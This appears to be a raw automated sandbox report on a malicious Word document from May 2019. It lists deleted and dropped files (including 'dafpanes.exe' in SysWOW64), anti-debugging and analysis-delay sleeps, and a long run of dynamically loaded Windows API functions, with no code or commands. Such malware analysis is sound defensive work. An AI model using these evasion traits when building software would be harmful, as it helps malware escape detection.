DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7531C625-7656-11E9-A15D-000C29BA3DA7}.dat
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7531C624-7656-11E9-A15D-000C29BA3DA7}.dat
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47E14D8D.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Schemas\MS Word_restart.xml
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.308.14888764
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.308.14888764
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.308.14888764
DeletedFile: C:\Windows\SysWOW64\dafpanes.exe
DeletedFile: C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
Guard pages use detected - possible anti-debugging.
A process attempted to delay the analysis task.
Process: WINWORD.EXE tried to sleep 601 seconds, actually delayed analysis time by 0 seconds
Process: OSPPSVC.EXE tried to sleep 300 seconds, actually delayed analysis time by 0 seconds
Process: splwow64.exe tried to sleep 1680 seconds, actually delayed analysis time by 0 seconds
Process: WmiPrvSE.exe tried to sleep 540 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: ADVAPI32.dll/LsaFreeMemory
DynamicLoader: SAMLIB.dll/SamGetAliasMembership
DynamicLoader: SAMLIB.dll/SamLookupIdsInDomain
DynamicLoader: SAMLIB.dll/SamCloseHandle
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabled
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: propsys.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/InitPropVariantFromStringAsVector
DynamicLoader: propsys.dll/PSCoerceToCanonicalValue
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: WININET.dll/InternetCrackUrlA
DynamicLoader: UxTheme.dll/EnableThemeDialogTexture
DynamicLoader: comctl32.dll/RegisterClassNameW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: urlmon.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/BufferedPaintStopAllAnimations
DynamicLoader: UxTheme.dll/BufferedPaintUnInit
DynamicLoader: ole32.dll/RevokeDragDrop
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: IEShims.dll/IEShims_GetOriginatingThreadId
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: urlmon.dll/
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: winshfhc.dll/
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/TraceMessage
DynamicLoader: ADVAPI32.dll/TraceMessageVa
DynamicLoader: MPCLIENT.DLL/MpManagerOpen
DynamicLoader: MPCLIENT.DLL/MpHandleClose
DynamicLoader: MPCLIENT.DLL/MpFreeMemory
DynamicLoader: MPCLIENT.DLL/MpScanStart
DynamicLoader: MPCLIENT.DLL/MpScanResult
DynamicLoader: MPCLIENT.DLL/MpThreatOpen
DynamicLoader: MPCLIENT.DLL/MpThreatEnumerate
DynamicLoader: MPCLIENT.DLL/MpConfigOpen
DynamicLoader: MPCLIENT.DLL/MpConfigGetValue
DynamicLoader: MPCLIENT.DLL/MpConfigClose
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: propsys.dll/PSPropertyBag_WriteDWORD
DynamicLoader: propsys.dll/PSPropertyBag_ReadDWORD
DynamicLoader: propsys.dll/PSPropertyBag_ReadBSTR
DynamicLoader: propsys.dll/PSPropertyBag_ReadStrAlloc
DynamicLoader: propsys.dll/
DynamicLoader: ADVAPI32.dll/TraceMessage
DynamicLoader: ADVAPI32.dll/TraceMessageVa
DynamicLoader: MPCLIENT.DLL/MpManagerOpen
DynamicLoader: MPCLIENT.DLL/MpHandleClose
DynamicLoader: MPCLIENT.DLL/MpFreeMemory
DynamicLoader: MPCLIENT.DLL/MpScanStart
DynamicLoader: MPCLIENT.DLL/MpScanResult
DynamicLoader: MPCLIENT.DLL/MpThreatOpen
DynamicLoader: MPCLIENT.DLL/MpThreatEnumerate
DynamicLoader: MPCLIENT.DLL/MpConfigOpen
DynamicLoader: MPCLIENT.DLL/MpConfigGetValue
DynamicLoader: MPCLIENT.DLL/MpConfigClose
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: ole32.dll/CoAllowSetForegroundWindow
DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation
DynamicLoader: ADVAPI32.dll/CommandLineFromMsiDescriptor
DynamicLoader: msiltcfg.dll/MsiSetInternalUI
DynamicLoader: msiltcfg.dll/MsiConfigureProductExW
DynamicLoader: msiltcfg.dll/MsiProvideComponentFromDescriptorW
DynamicLoader: msiltcfg.dll/MsiDecomposeDescriptorW
DynamicLoader: msiltcfg.dll/MsiGetProductInfoW
DynamicLoader: msiltcfg.dll/MsiAdvertiseScriptW
DynamicLoader: msiltcfg.dll/MsiQueryProductStateW
DynamicLoader: msiltcfg.dll/MsiIsProductElevatedW
DynamicLoader: msiltcfg.dll/MsiReinstallProductW
DynamicLoader: USER32.dll/MsgWaitForMultipleObjects
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetProcessWindowStation
DynamicLoader: USER32.dll/CloseWindowStation
DynamicLoader: USER32.dll/GetUserObjectInformationW
DynamicLoader: msi.dll/MsiDecomposeDescriptorW
DynamicLoader: msi.dll/MsiGetComponentPathW
DynamicLoader: msi.dll/MsiGetProductInfoW
DynamicLoader: msi.dll/MsiProvideComponentFromDescriptorW
DynamicLoader: msi.dll/MsiQueryFeatureStateW
DynamicLoader: msi.dll/MsiQueryFeatureStateFromDescriptorW
DynamicLoader: msi.dll/MsiSetInternalUI
DynamicLoader: msi.dll/MsiAdvertiseScriptW
DynamicLoader: msi.dll/MsiQueryProductStateW
DynamicLoader: msi.dll/MsiIsProductElevatedW
DynamicLoader: msi.dll/MsiReinstallProductW
DynamicLoader: msi.dll/MsiConfigureProductExW
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: SFC.DLL/SfcIsKeyProtected
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: SXS.DLL/CreateAssemblyNameObject
DynamicLoader: SXS.DLL/CreateAssemblyCache
DynamicLoader: SFC.DLL/SfcIsFileProtected
DynamicLoader: SETUPAPI.dll/PnpIsFilePnpDriver
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: apphelp.dll/AllowPermLayer
DynamicLoader: kernel32.dll/BaseIsAppcompatInfrastructureDisabled
DynamicLoader: apphelp.dll/SdbInitDatabase
DynamicLoader: apphelp.dll/SdbGetMatchingExe
DynamicLoader: apphelp.dll/SdbReleaseDatabase
DynamicLoader: MPR.dll/WNetGetConnectionW
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoA
DynamicLoader: urlmon.dll/CoInternetQueryInfo
DynamicLoader: WININET.dll/CommitUrlCacheEntryA
DynamicLoader: WININET.dll/SetUrlCacheEntryInfoW
DynamicLoader: USER32.dll/PostQuitMessage
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: USER32.dll/UnregisterClassW
DynamicLoader: RPCRT4.dll/RpcEpUnregister
DynamicLoader: RPCRT4.dll/RpcBindingVectorFree
DynamicLoader: RPCRT4.dll/RpcServerUnregisterIf
DynamicLoader: IEShims.dll/IEShims_Uninitialize
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ntdll.dll/LdrUnregisterDllNotification
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/GetModuleHandleExW
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: wwlib.dll/FMain
DynamicLoader: wwlib.dll/wdCommandDispatch
DynamicLoader: wwlib.dll/wdGetApplicationObject
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: apphelp.dll/ApphelpCheckRunAppEx
DynamicLoader: apphelp.dll/ApphelpQueryModuleDataEx
DynamicLoader: apphelp.dll/ApphelpParseModuleData
DynamicLoader: apphelp.dll/ApphelpCreateAppcompatData
DynamicLoader: apphelp.dll/SdbInitDatabaseEx
DynamicLoader: apphelp.dll/SdbReleaseDatabase
DynamicLoader: apphelp.dll/SdbUnpackAppCompatData
DynamicLoader: apphelp.dll/SdbQueryContext
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: kernel32.dll/InitializeSListHead
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetLongPathNameA
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: kernel32.dll/RegisterApplicationRecoveryCallback
DynamicLoader: kernel32.dll/ApplicationRecoveryInProgress
DynamicLoader: kernel32.dll/ApplicationRecoveryFinished
DynamicLoader: kernel32.dll/RegisterApplicationRestart
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/WerRegisterFile
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/QueryThreadCycleTime
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/SetProcessDEPPolicy
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/GetCalendarInfoEx
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/EnumSystemLocalesEx
DynamicLoader: kernel32.dll/EnumCalendarInfoExEx
DynamicLoader: kernel32.dll/EnumDateFormatsExEx
DynamicLoader: kernel32.dll/EnumTimeFormatsEx
DynamicLoader: kernel32.dll/GetThreadUILanguage
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: IMM32.DLL/ImmDisableIME
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: UxTheme.DLL/IsThemeActive
DynamicLoader: UxTheme.DLL/OpenThemeData
DynamicLoader: UxTheme.DLL/CloseThemeData
DynamicLoader: UxTheme.DLL/DrawThemeBackground
DynamicLoader: UxTheme.DLL/DrawThemeEdge
DynamicLoader: UxTheme.DLL/DrawThemeText
DynamicLoader: UxTheme.DLL/GetThemeBackgroundContentRect
DynamicLoader: UxTheme.DLL/GetThemeBackgroundExtent
DynamicLoader: UxTheme.DLL/GetThemePartSize
DynamicLoader: UxTheme.DLL/GetThemeTextExtent
DynamicLoader: UxTheme.DLL/GetThemeTextMetrics
DynamicLoader: UxTheme.DLL/GetThemeBackgroundRegion
DynamicLoader: UxTheme.DLL/HitTestThemeBackground
DynamicLoader: UxTheme.DLL/DrawThemeIcon
DynamicLoader: UxTheme.DLL/IsThemePartDefined
DynamicLoader: UxTheme.DLL/IsThemeBackgroundPartiallyTransparent
DynamicLoader: UxTheme.DLL/GetThemeColor
DynamicLoader: UxTheme.DLL/GetThemeMetric
DynamicLoader: UxTheme.DLL/GetThemeString
DynamicLoader: UxTheme.DLL/GetThemeBool
DynamicLoader: UxTheme.DLL/GetThemeInt
DynamicLoader: UxTheme.DLL/GetThemeEnumValue
DynamicLoader: UxTheme.DLL/GetThemePosition
DynamicLoader: UxTheme.DLL/GetThemeFont
DynamicLoader: UxTheme.DLL/GetThemeRect
DynamicLoader: UxTheme.DLL/GetThemeMargins
DynamicLoader: UxTheme.DLL/GetThemeIntList
DynamicLoader: UxTheme.DLL/GetThemePropertyOrigin
DynamicLoader: UxTheme.DLL/SetWindowTheme
DynamicLoader: UxTheme.DLL/GetThemeFilename
DynamicLoader: UxTheme.DLL/GetThemeSysColor
DynamicLoader: UxTheme.DLL/GetThemeSysColorBrush
DynamicLoader: UxTheme.DLL/GetThemeSysSize
DynamicLoader: UxTheme.DLL/GetThemeSysBool
DynamicLoader: UxTheme.DLL/GetThemeSysFont
DynamicLoader: UxTheme.DLL/GetThemeSysInt
DynamicLoader: UxTheme.DLL/GetThemeSysString
DynamicLoader: UxTheme.DLL/IsAppThemed
DynamicLoader: UxTheme.DLL/GetWindowTheme
DynamicLoader: UxTheme.DLL/GetThemeAppProperties
DynamicLoader: UxTheme.DLL/SetThemeAppProperties
DynamicLoader: UxTheme.DLL/GetThemeDocumentationProperty
DynamicLoader: UxTheme.DLL/EnableThemeDialogTexture
DynamicLoader: UxTheme.DLL/GetCurrentThemeName
DynamicLoader: UxTheme.DLL/EnableTheming
DynamicLoader: UxTheme.DLL/DrawThemeParentBackground
DynamicLoader: UxTheme.DLL/DrawThemeTextEx
DynamicLoader: UxTheme.DLL/BeginPanningFeedback
DynamicLoader: UxTheme.DLL/UpdatePanningFeedback
DynamicLoader: UxTheme.DLL/EndPanningFeedback
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: riched20.dll/REExtendedRegisterClass
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: USER32.dll/ChangeWindowMessageFilter
DynamicLoader: USER32.dll/AddClipboardFormatListener
DynamicLoader: USER32.dll/RemoveClipboardFormatListener
DynamicLoader: USER32.dll/GetUpdatedClipboardFormats
DynamicLoader: mscoree.dll/GetRequestedRuntimeInfo
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/GetRequestedRuntimeInfo_RetAddr
DynamicLoader: mscoreei.dll/GetRequestedRuntimeInfo
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: mscoree.dll/LockClrVersion
DynamicLoader: mscoree.dll/CLRCreateInstance
DynamicLoader: mscoreei.dll/LockClrVersion_RetAddr
DynamicLoader: mscoreei.dll/LockClrVersion
DynamicLoader: mscoreei.dll/CLRCreateInstance
DynamicLoader: ole32.dll/OleLoadFromStream
DynamicLoader: OLEAUT32.dll/SysAllocStringByteLen
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/VariantChangeType
DynamicLoader: OLEAUT32.dll/VariantClear
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OSPPC.DLL/SLClose
DynamicLoader: OSPPC.DLL/SLConsumeRight
DynamicLoader: OSPPC.DLL/SLGetPKeyId
DynamicLoader: OSPPC.DLL/SLGetPolicyInformation
DynamicLoader: OSPPC.DLL/SLGetApplicationPolicy
DynamicLoader: OSPPC.DLL/SLGetLicensingStatusInformation
DynamicLoader: OSPPC.DLL/SLLoadApplicationPolicies
DynamicLoader: OSPPC.DLL/SLOpen
DynamicLoader: OSPPC.DLL/SLPersistApplicationPolicies
DynamicLoader: OSPPC.DLL/SLUnloadApplicationPolicies
DynamicLoader: OSPPC.DLL/SLGetProductSkuInformation
DynamicLoader: OSPPC.DLL/SLInstallProofOfPurchase
DynamicLoader: OSPPC.DLL/SLInstallLicense
DynamicLoader: OSPPC.DLL/SLRegisterPlugin
DynamicLoader: OSPPC.DLL/SLUninstallProofOfPurchase
DynamicLoader: OSPPC.DLL/SLGetPKeyInformation
DynamicLoader: OSPPC.DLL/SLGetSLIDList
DynamicLoader: OSPPC.DLL/SLGenerateOfflineInstallationId
DynamicLoader: OSPPC.DLL/SLDepositOfflineConfirmationId
DynamicLoader: OSPPC.DLL/SLPersistRTSPayloadOverride
DynamicLoader: OSPPC.DLL/SLSetAuthenticationData
DynamicLoader: OSPPC.DLL/SLGetAuthenticationResult
DynamicLoader: OSPPC.DLL/SLGetServiceInformation
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Comctl32.dll/SetWindowSubclass
DynamicLoader: Comctl32.dll/DefSubclassProc
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Winspool.DRV/GetPrinterW
DynamicLoader: Winspool.DRV/GetPrinterA
DynamicLoader: Winspool.DRV/DeviceCapabilitiesW
DynamicLoader: Winspool.DRV/DeviceCapabilitiesA
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/OpenPrinterA
DynamicLoader: Winspool.DRV/DocumentPropertiesW
DynamicLoader: Winspool.DRV/DocumentPropertiesA
DynamicLoader: Winspool.DRV/EnumPrintersA
DynamicLoader: Winspool.DRV/EnumJobsA
DynamicLoader: Winspool.DRV/GetPrinterDriverA
DynamicLoader: Winspool.DRV/ClosePrinter
DynamicLoader: Winspool.DRV/EnumPrintersW
DynamicLoader: Winspool.DRV/EnumJobsW
DynamicLoader: Winspool.DRV/GetPrinterDriverW
DynamicLoader: Winspool.DRV/AddPrinterDriverA
DynamicLoader: Winspool.DRV/AddPrinterDriverW
DynamicLoader: Winspool.DRV/GetPrinterDriverDirectoryA
DynamicLoader: Winspool.DRV/GetPrinterDriverDirectoryW
DynamicLoader: Winspool.DRV/DeletePrinter
DynamicLoader: Winspool.DRV/AddPrinterA
DynamicLoader: Winspool.DRV/AddPrinterW
DynamicLoader: Winspool.DRV/AddPrinterConnectionW
DynamicLoader: Winspool.DRV/GetDefaultPrinterW
DynamicLoader: Winspool.DRV/StartDocPrinterW
DynamicLoader: Winspool.DRV/EndDocPrinter
DynamicLoader: Winspool.DRV/StartPagePrinter
DynamicLoader: Winspool.DRV/EndPagePrinter
DynamicLoader: Winspool.DRV/WritePrinter
DynamicLoader: Winspool.DRV/IsValidDevmodeW
